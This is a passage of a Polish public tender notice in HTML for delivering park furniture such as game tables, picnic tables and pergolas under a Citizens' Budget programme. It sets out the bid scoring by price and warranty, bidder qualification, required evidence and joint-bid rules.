class="mb-0">37416000-7 - Sprzęt wypoczynkowy</p> <p class="mb-0">39113600-3 - Ławki</p> <p class="mb-0">44613800-8 - Pojemniki na tworzywa odpadowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>1)	cena (C) - waga kryterium 60 %;<br/>2)	okres gwarancji (G) - waga kryterium 40 %.<br/>2.	Zasady oceny ofert w poszczególnych kryteriach:<br/>	1) cena (C) - waga 60 %<br/> cena najniższa brutto*<br/>	C =------------------------------------------------ x 100 pkt x 60 %<br/> cena oferty ocenianej brutto<br/>*spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/>a)	podstawą przyznania punktów w kryterium „cena&#34; będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym.<br/>b)	cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>	2) okres gwarancji (G) - waga 40 %<br/><br/>punkty przydzielane będą zgodnie z poniższą tabelą:<br/>Okres udzielonej gwarancji (miesiące)	Liczba punktów<br/>36 - 20 pkt<br/>48	- 40 pkt<br/>a)	do obliczenia punktów za kryterium „okres gwarancji” Zamawiający przyjmie termin podany w Formularzu oferty załącznik nr 2 do SWZ;<br/>b)	okres udzielonej gwarancji liczony od dnia odbioru przedmiotu zamówienia;<br/>c)	wymagany minimalny okres udzielonej gwarancji wynosi 24 miesiące;<br/>d)	w przypadku, gdy Wykonawca nie wskaże w ogóle w ofercie minimalnego okresu gwarancji Zamawiający otrzyma 0 punktów. Tym samym Wykonawca zobowiązuje się do udzielenia pełnej gwarancji na okres 24 miesięcy;<br/>e)	Jeżeli Wykonawca poda w formularzu oferty okres gwarancji poniżej 24 miesięcy Zamawiający odrzuci taką ofertę jako niezgodną z SWZ;<br/>f)	Jeżeli Wykonawca poda okres gwarancji powyżej 48 miesięcy, Zamawiający przyzna ofercie Wykonawcy 40 pkt, a do oferty zostanie przyjęty okres gwarancji zaproponowany przez Wykonawcę.<br/>3)	Za ofertę najkorzystniejszą uznana zostanie oferta, która w sumie uzyska najwyższą liczbę punktów w określonych kryteriach <br/>PŁ= C+G<br/>	PŁ- łączna liczba punktów <br/>C- liczba punktów w kryterium Cena <br/>G- liczba punktów w kryterium okres gwarancji</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa elementów małej architektury w ramach projektów Budżetu Obywatelskiego, część III zamówienia obejmuje:<br/>2 szt. stołów do gry „szachy + chińczyk”,<br/>10 szt. stołów rekreacyjnych piknikowych.<br/>Szczegółowy Opis Przedmiotu Zamówienia stanowi załącznik nr 1 do SWZ.<br/>W przypadku kiedy Zamawiający w opisie przedmiotu zamówienia określa dopuszczalny minimalny / maksymalny zakres wymiarów, parametry oferowanych produktów winny mieścić się we wskazanych przez Zamawiającego zakresach pod rygorem odrzucenia oferty.<br/>Wykonawca dostarczy przedmiot zamówienia do siedziby Zamawiającego i dokona rozładunku we własnym zakresie w miejscu wskazanym przez Zamawiającego.<br/>Na przedmiot umowy Wykonawca udziela gwarancji. Minimalny okres gwarancji wynosi 24 miesiące.<br/>W przypadku gdy Zamawiający użył w opisie przedmiotu zamówienia nazw własnych produktów, materiałów należy je rozumieć jako przykładowe, ma to jedynie na celu doprecyzowanie poziomu oczekiwań Zamawiającego w stosunku do określonego rozwiązania i służy wskazaniu minimalnych / maksymalnych parametrów, cech użytkowych i funkcjonalnych wymaganych przez Zamawiającego. Dopuszcza się składanie ofert przy zastosowaniu rozwiązań równoważnych do opisanych w Załączniku nr 1 do SWZ. <br/>Ponadto, w każdym przypadku stwierdzenie, że opis czy też cecha opisanego produktu, może wskazywać na źródło pochodzenia lub producenta to Wykonawca również jest uprawniony do stosowania produktów równoważnych.<br/>Kryteria równoważności: <br/>Pod pojęciem „równoważności” rozumie się oferowanie produktów, materiałów posiadających łącznie:<br/>a)	co najmniej te same cechy (tj. właściwości funkcjonalne i użytkowe), co podane w załączniku 1 do SWZ, <br/>b)	parametry techniczne na poziomie nie niższym niż wskazane przez Zamawiającego za wyjątkiem wymiaru odległości między listwami,<br/>c)	Zamawiający dopuszcza zaoferowanie produktów o rozszerzonych funkcjach i lepszych parametrach, pod warunkiem iż spełniają one minimalne wymagania określone w załączniku nr 1 do SWZ za wyjątkiem wymiaru odległości między listwami,<br/>d)	parametry techniczne na poziomie nie wyższym niż wskazane przez Zamawiającego dotyczące odległości między listwami. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">43325000-7 - Wyposażenie parków i placów zabaw</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">37416000-7 - Sprzęt wypoczynkowy</p> <p class="mb-0">39113600-3 - Ławki</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>1)	cena (C) - waga kryterium 60 %;<br/>2)	okres gwarancji (G) - waga kryterium 40 %.<br/>2.	Zasady oceny ofert w poszczególnych kryteriach:<br/>	1) cena (C) - waga 60 %<br/> cena najniższa brutto*<br/>	C =------------------------------------------------ x 100 pkt x 60 %<br/> cena oferty ocenianej brutto<br/>*spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>a)	podstawą przyznania punktów w kryterium „cena&#34; będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym.<br/>b)	cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>	2) okres gwarancji (G) - waga 40 %<br/>punkty przydzielane będą zgodnie z poniższą tabelą:<br/>Okres udzielonej gwarancji (miesiące)	Liczba punktów<br/>36	- 20 pkt<br/>48	- 40 pkt<br/>a)	do obliczenia punktów za kryterium „okres gwarancji” Zamawiający przyjmie termin podany w Formularzu oferty załącznik nr 2 do SWZ;<br/>b)	okres udzielonej gwarancji liczony od dnia odbioru przedmiotu zamówienia;<br/>c)	wymagany minimalny okres udzielonej gwarancji wynosi 24 miesiące;<br/>d)	w przypadku, gdy Wykonawca nie wskaże w ogóle w ofercie minimalnego okresu gwarancji Zamawiający otrzyma 0 punktów. Tym samym Wykonawca zobowiązuje się do udzielenia pełnej gwarancji na okres 24 miesięcy;<br/>e)	Jeżeli Wykonawca poda w formularzu oferty okres gwarancji poniżej 24 miesięcy Zamawiający odrzuci taką ofertę jako niezgodną z SWZ;<br/>f)	Jeżeli Wykonawca poda okres gwarancji powyżej 48 miesięcy, Zamawiający przyzna ofercie Wykonawcy 40 pkt, a do oferty zostanie przyjęty okres gwarancji zaproponowany przez Wykonawcę.<br/>3)	Za ofertę najkorzystniejszą uznana zostanie oferta, która w sumie uzyska najwyższą liczbę punktów w określonych kryteriach <br/>PŁ= C+G<br/>	PŁ- łączna liczba punktów <br/>C- liczba punktów w kryterium Cena <br/>G- liczba punktów w kryterium okres gwarancji</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa elementów małej architektury w ramach projektów Budżetu Obywatelskiego, część IV obejmuje:<br/>6 szt. pergoli z ławką i dwiema donicami<br/>Szczegółowy Opis Przedmiotu Zamówienia stanowi załącznik nr 1 do SWZ.<br/>W przypadku kiedy Zamawiający w opisie przedmiotu zamówienia określa dopuszczalny minimalny / maksymalny zakres wymiarów, parametry oferowanych produktów winny mieścić się we wskazanych przez Zamawiającego zakresach pod rygorem odrzucenia oferty.<br/>Wykonawca dostarczy przedmiot zamówienia do siedziby Zamawiającego i dokona rozładunku we własnym zakresie w miejscu wskazanym przez Zamawiającego.<br/>Na przedmiot umowy Wykonawca udziela gwarancji. Minimalny okres gwarancji wynosi 24 miesiące.<br/>W przypadku gdy Zamawiający użył w opisie przedmiotu zamówienia nazw własnych produktów, materiałów należy je rozumieć jako przykładowe, ma to jedynie na celu doprecyzowanie poziomu oczekiwań Zamawiającego w stosunku do określonego rozwiązania i służy wskazaniu minimalnych / maksymalnych parametrów, cech użytkowych i funkcjonalnych wymaganych przez Zamawiającego. Dopuszcza się składanie ofert przy zastosowaniu rozwiązań równoważnych do opisanych w Załączniku nr 1 do SWZ. <br/>Ponadto, w każdym przypadku stwierdzenie, że opis czy też cecha opisanego produktu, może wskazywać na źródło pochodzenia lub producenta to Wykonawca również jest uprawniony do stosowania produktów równoważnych.<br/>Kryteria równoważności: <br/>Pod pojęciem „równoważności” rozumie się oferowanie produktów, materiałów posiadających łącznie:<br/>a)	co najmniej te same cechy (tj. właściwości funkcjonalne i użytkowe), co podane w załączniku 1 do SWZ, <br/>b)	parametry techniczne na poziomie nie niższym niż wskazane przez Zamawiającego za wyjątkiem wymiaru odległości między listwami,<br/>c)	Zamawiający dopuszcza zaoferowanie produktów o rozszerzonych funkcjach i lepszych parametrach, pod warunkiem iż spełniają one minimalne wymagania określone w załączniku nr 1 do SWZ za wyjątkiem wymiaru odległości między listwami,<br/>d)	parametry techniczne na poziomie nie wyższym niż wskazane przez Zamawiającego dotyczące odległości między listwami. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">43325000-7 - Wyposażenie parków i placów zabaw</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">37416000-7 - Sprzęt wypoczynkowy</p> <p class="mb-0">39113600-3 - Ławki</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>1)	cena (C) - waga kryterium 60 %;<br/>2)	okres gwarancji (G) - waga kryterium 40 %.<br/>2.	Zasady oceny ofert w poszczególnych kryteriach:<br/>	1) cena (C) - waga 60 %<br/> cena najniższa brutto*<br/>	C =------------------------------------------------ x 100 pkt x 60 %<br/> cena oferty ocenianej brutto<br/>*spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>a)	podstawą przyznania punktów w kryterium „cena&#34; będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym.<br/>b)	cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>	2) okres gwarancji (G) - waga 40 %<br/>punkty przydzielane będą zgodnie z poniższą tabelą:<br/>Okres udzielonej gwarancji (miesiące)	Liczba punktów<br/>36 - 20 pkt<br/>48 - 40 pkt<br/>a)	do obliczenia punktów za kryterium „okres gwarancji” Zamawiający przyjmie termin podany w Formularzu oferty załącznik nr 2 do SWZ;<br/>b)	okres udzielonej gwarancji liczony od dnia odbioru przedmiotu zamówienia;<br/>c)	wymagany minimalny okres udzielonej gwarancji wynosi 24 miesiące;<br/>d)	w przypadku, gdy Wykonawca nie wskaże w ogóle w ofercie minimalnego okresu gwarancji Zamawiający otrzyma 0 punktów. Tym samym Wykonawca zobowiązuje się do udzielenia pełnej gwarancji na okres 24 miesięcy;<br/>e)	Jeżeli Wykonawca poda w formularzu oferty okres gwarancji poniżej 24 miesięcy Zamawiający odrzuci taką ofertę jako niezgodną z SWZ;<br/>f)	Jeżeli Wykonawca poda okres gwarancji powyżej 48 miesięcy, Zamawiający przyzna ofercie Wykonawcy 40 pkt, a do oferty zostanie przyjęty okres gwarancji zaproponowany przez Wykonawcę.<br/>3)	Za ofertę najkorzystniejszą uznana zostanie oferta, która w sumie uzyska najwyższą liczbę punktów w określonych kryteriach <br/>PŁ= C+G<br/>	PŁ- łączna liczba punktów <br/>C- liczba punktów w kryterium Cena <br/>G- liczba punktów w kryterium okres gwarancji</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale IX SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym: <br/>Zamawiający nie stawia warunku w powyższym zakresie <br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie<br/>3)	sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie <br/>4)	zdolności technicznej lub zawodowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie <br/>3.	Zamawiający może na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu Ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej - Załącznik Nr 5 do SWZ.<br/>2) odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw do wykluczenia na podstawie art. 109 ust. 1 pkt 4 ustawy lub informacje o możliwości jego uzyskania za pomocą bezpłatnych i ogólnodostępnych baz danych w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz.U. z 2021 r. poz. 2070 z późn. zm.) bądź podaniem linku do powszechnej i bezpłatnej bazy danych gdzie wskazany dokument jest dostępny w formie elektronicznej;<br/>a. w przypadku powoływania się przez Wykonawcę na podmiot udostępniający zasoby, Wykonawca składa podmiotowy środek dowodowy o którym mowa pkt 2) dot. tego podmiotu, w celu wykazania że nie podlega on wykluczeniu na podstawie art. 109 ust. 1 pkt 4 ustawy, <br/>b. w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument, o którym mowa w pkt 2) składa każdy z nich.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Przedmiotowe środki dowodowe potwierdzające, że oferowane dostawy spełniają wymagania określone przez Zamawiającego – SKŁADANE WRAZ Z OFERTĄ:<br/>1)	Zamawiający (zgodnie z art. 107 ust. 1 ustawy Pzp) żąda od Wykonawców złożenia wraz z ofertą przedmiotowych środków dowodowych, na potwierdzenie zgodności oferowanych dostaw z wymaganiami określonymi w opisie przedmiotu zamówienia.<br/>2)	Wykonawca, w celu potwierdzenia, że oferowana dostawa spełnia wymagania określone przez Zamawiającego składa wraz z ofertą następujące środki dowodowe:<br/>a)	Formularz opisu technicznego zgodnie z wymaganiami SWZ – załącznik nr 2a do SWZ – dla każdej części, której dotyczy oferta w celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego. Wykonawca jest zobowiązany do jednoznacznego opisu, z którego w sposób niebudzący wątpliwości powinno wynikać, iż oferowany przedmiot zamówienia spełnia wszystkie wymagania zawarte w Szczegółowym Opisie Przedmiotu Zamówienia - załączniku nr 1 do SWZ. W przypadku nie złożenia Załącznika nr 2a do SWZ Zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp.<br/>b)	foldery lub karty katalogowe lub karty produktowe lub karty charakterystyki lub karty materiałowe lub oświadczenia producenta lub jego autoryzowanego przedstawiciela albo inne równoważne dokumenty lub oświadczenia itp. wraz z kolorowymi zdjęciami lub rysunkami oferowanych produktów.<br/>3)	Zgodność oferowanego asortymentu będzie weryfikowana między innymi na podstawie złożonego Formularza opisu technicznego (wg, Formularza 2a) oraz dokumentów wskazanych powyżej w pkt 2 lit. b.<br/>4)	Zamawiający przewiduje możliwość wzywania do złożenia lub uzupełnienia przedmiotowych środków dowodowych pkt 2 lit. b w wyznaczonym terminie, jeżeli Wykonawca ich nie złożył lub złożone przedmiotowe środki dowodowe są niekompletne. Nie będzie dopuszczalne uzupełnienie dokumentów przedmiotowych, jeśli przedłożone z ofertą dokumenty potwierdzają, że oferta jest niezgodna z opisem przedmiotu zamówienia tj. Wykonawca oferuje produkt nie spełniający oczekiwań Zamawiającego wskazanych w dokumentach zamówienia. Przedmiotowe środki dowodowe nie będą uzupełniane, jeżeli na skutek merytorycznej oceny Zamawiający uzna, że nie odpowiadają one wymaganiom przedmiotu zamówienia.<br/> Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści przedmiotowych środków dowodowych,<br/>5)	Przedmiotowe środki dowodowe składa się w postaci elektronicznej i opatruje kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym przez osobę upoważnioną do reprezentowania wykonawcy zgodnie z formą reprezentacji określoną w dokumencie rejestrowym właściwym dla formy organizacyjnej lub innym dokumencie. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Foldery lub karty katalogowe lub karty produktowe lub karty charakterystyki lub karty materiałowe lub oświadczenia producenta lub jego autoryzowanego przedstawiciela albo inne równoważne dokumenty lub oświadczenia itp. wraz z kolorowymi zdjęciami lub rysunkami oferowanych produktów. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Ofertę składa się na Formularzu Ofertowym - zgodnie z Załącznikiem Nr 2 do SWZ Wraz z ofertą Wykonawca jest zobowiązany złożyć:<br/>1)	Formularz opisu technicznego – zgodnie z Załącznikiem Nr 2a,<br/>2)	Oświadczenie, o którym mowa w Rozdziale X ust. 1 SWZ – załącznik nr 3 do SWZ, składają odrębnie:<br/>a) Wykonawca; <br/>b) każdy ze wspólników konsorcjum (w przypadku składania oferty wspólnej) oraz każdy ze wspólników spółki cywilnej (jeżeli dotyczy);<br/>c) podmiot udostępniający zasoby, czyli podmioty, na zasoby których powołuje się Wykonawca w celu spełnienia warunków udziału w postępowaniu (jeżeli dotyczy).<br/>3)	przedmiotowe środki dowodowe, o których mowa w Rozdziale IV ust. 11 pkt. 2 lit. b.<br/>4)	Zobowiązanie podmiotów udostępniających zasoby do oddania do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia. Oświadczenie podmiotu udostępniającego zasoby stanowi Załącznik nr 4 do SWZ (jeżeli dotyczy).<br/>5)	w przypadku, gdy oferta została podpisana przez inną osobę niż umocowana w dokumencie rejestrowym Wykonawcy, bądź w przypadku złożenia oferty wspólnej, dokument (np. pełnomocnictwo) potwierdzający, że oferta została złożona przez osobę do tego upoważnioną.<br/>6)	pełnomocnictwo do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie zamówienia w postępowaniu o udzielenie zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego podpisane przez wszystkich Wykonawców wspólnie ubiegających się o zamówienie zgodnie z zasadami ich reprezentacji (jeżeli dotyczy).<br/>Pełnomocnictwo powinno zawierać w szczególności wskazanie: <br/>⎯ postępowania o zamówienie publiczne, którego dotyczy; <br/>⎯ wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby, <br/>⎯ ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>7)	oświadczenia i/lub dokumenty na podstawie których, Zamawiający dokona oceny skuteczności zastrzeżenia informacji zawartych w ofercie, stanowiących tajemnicę przedsiębiorstwa, w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji (jeżeli Wykonawca zastrzega takie informacje).<br/>W przypadku zaoferowania rozwiązań równoważnych Wykonawca zobowiązany jest załączyć do oferty szczegółowy opis oferowanych produktów, w którym musi wykazać szczegółowo ich równoważność z warunkami i wymaganiami opisanymi w załączniku nr 1 do SWZ. Opis zaproponowanych rozwiązań równoważnych powinien być na tyle dokładny, żeby Zamawiający przy ocenie oferty mógł ocenić spełnienie wymagań dotyczących ich parametrów technicznych oraz rozstrzygnąć, czy zaproponowane rozwiązania są równoważne. <br/>Do szczegółowego opisu oferowanych produktów równoważnych należy dołączyć:<br/>a) dokumentację oferowanego produktu równoważnego z zaznaczonymi odpowiednimi fragmentami potwierdzającymi spełnianie przez zaoferowany produkt równoważny opisanych w SWZ wymagań, <br/>b) zestawienie opisanych wymagań wraz ze wskazaniem miejsc w dokumentacji oferowanego produktu równoważnego (numery stron), w których znajduje się potwierdzenie spełniania tych wymagań. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika (lidera) do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty - nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/>2.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które dostawy wykonają poszczególni Wykonawcy. Wzór stosownego oświadczenia został zawarty w formularzu ofertowym (stanowiącym załącznik nr 2 do SWZ) i Zamawiający zaleca złożyć to oświadczenie właśnie w tym formularzu.<br/>3.	Oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Osoba podpisująca ofertę musi posiadać umocowanie prawne do reprezentacji. Umocowanie musi wynikać z treści pełnomocnictwa załączonego do oferty – treść pełnomocnictwa powinna dokładnie określać zakres umocowania;<br/>4.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>5.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>6. Nie dopuszcza się uczestniczenia danego Wykonawcy w więcej niż jednej grupie Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Niedopuszczalnym również jest złożenie przez jednego Wykonawcę równocześnie oferty indywidualnej oraz w ramach grupy Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>7. Wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą ponosić odpowiedzialność solidarną za wykonanie umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający 